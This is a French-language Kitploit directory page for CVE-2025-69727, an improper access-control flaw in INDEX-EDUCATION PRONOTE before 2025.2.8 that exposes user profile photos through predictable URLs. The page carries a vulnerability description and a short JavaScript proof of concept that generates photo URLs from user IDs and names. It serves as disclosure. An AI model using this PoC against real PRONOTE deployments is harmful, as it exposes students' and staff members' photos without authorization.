Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-69727 — CVE-2025-69727 | Kitploit
Outils/GitHubGitHub/0xzerosec/cve-2025-69727
ReconnaissanceVulnerability AnalysisInformation GatheringWeb SecurityMisconfiguration
GitHub0xzerosec/cve-2025-69727

CVE-2025-69727

CVE-2025-69727

Voir le dépôt
2il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-69727

Fournisseur du produit

INDEX-EDUCATION

Produit affecté (code de base)

PRONOTE - 202X.X.X < 2025.2.8

Description

Une vulnérabilité de contrôle d'accès incorrect existe dans INDEX-EDUCATION PRONOTE avant la version 2025.2.8. Les composants affectés (composeUrlImgPhotoIndividu) permettent la construction d'URLs directes vers les images de profil des utilisateurs en se basant uniquement sur des identifiants prévisibles tels que les ID utilisateurs et les noms. En raison de l'absence de vérifications d'autorisation et de l'absence de limitation de débit lors de la génération ou de l'accès à ces URLs, un acteur non authentifié ou non autorisé peut récupérer les photos de profil des utilisateurs en élaborant des requêtes avec des identifiants devinés ou connus.

PoC

root@kitploit:~
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";

IE.fModule({
  f: function (exports, require, module, global) {
    const ObjetElement = require("ObjetElement");
    const AccesApp = global.GApplication;

    const comm = AccesApp.communication;

    for (const obj of arr) {
      const path = comm.composeUrlFichierExterne(
        obj.L.replace(/[\s]/gi, "_") + ".jpg",
        new ObjetElement.ObjetElement("", obj.N)
      );

      const url = `${base}/${path}`;

      console.log(url);
    }
  },
  fn: "testIEmodule.js",
});

Découvreurs

  • raphckrman
  • GameCreep35
Télécharger l’outil